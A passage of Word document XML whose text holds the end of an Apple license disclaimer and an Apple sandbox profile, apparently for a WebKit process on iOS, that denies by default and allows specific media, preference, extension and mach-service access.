      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>; notice, this list of conditions and the following disclaimer in the</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>; documentation and/or other materials provided with the distribution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>; THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS''</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>; AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>; THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>; PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>; BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>; CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>; SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>; INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>; CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>; ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>; THE POSSIBILITY OF SUCH DAMAGE.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>(version 1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>(deny default (with partial-symbolication))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>(allow system-audit file-read-metadata)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>(import "UIKit-apps.sb")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>(import "removed-dev-nodes.sb")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>(uikit-app 'with-opengl 'with-location-services)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>;; Access to media controls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>(play-media)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>(media-remote)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>;; Read-only preferences and data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>(mobile-preferences-read</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    "com.apple.LaunchServices"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    "com.apple.WebFoundation"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    "com.apple.mobileipod")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>;; Sandbox extensions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>(define (apply-read-and-issue-extension op path-filter)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    (op file-read* path-filter)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    (op file-issue-extension (require-all (extension-class "com.apple.app-sandbox.read") path-filter)))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>(define (apply-write-and-issue-extension op path-filter)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    (op file-write* path-filter)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    (op file-issue-extension (require-all (extension-class "com.apple.app-sandbox.read-write") path-filter)))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>(define (read-only-and-issue-extensions path-filter)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    (apply-read-and-issue-extension allow path-filter))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>(define (read-write-and-issue-extensions path-filter)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    (apply-read-and-issue-extension allow path-filter)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    (apply-write-and-issue-extension allow path-filter))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>(read-only-and-issue-extensions (extension "com.apple.app-sandbox.read"))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>(read-write-and-issue-extensions (extension "com.apple.app-sandbox.read-write"))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>;; Access to client's cache folder &amp; re-vending to CFNetwork.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>;; FIXME: Remove the webkti specific extension classes &lt;rdar://problem/17755931&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>(allow file-issue-extension (require-all</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    (extension "com.apple.app-sandbox.read-write")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    (extension-class "com.apple.nsurlstorage.extension-cache")))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>;; Allow the OpenGL Profiler to attach.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>(instruments-support)    ; For &lt;rdar://problem/7931952&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>;; MediaAccessibility</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>(mobile-preferences-read "com.apple.mediaaccessibility")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>(mobile-preferences-read-write "com.apple.mediaaccessibility.public")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>;; Remote Web Inspector</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>(allow mach-lookup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">       (global-name "com.apple.webinspector"))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>;; Various services required by CFNetwork and other frameworks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>(allow mach-lookup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    (global-name "com.apple.PowerManagement.control")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">    (global-name "com.apple.accountsd.accountmanager"))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>(deny file-write-create (vnode-type SYMLINK))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00302E7E">
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>(deny file-read-xattr file-write-xattr (xattr-regex #"^com\.apple\.security\.private\."))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRPr="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00302E7E" w:rsidRDefault="00302E7E" w:rsidP="00302E7E">
      <w:pPr>
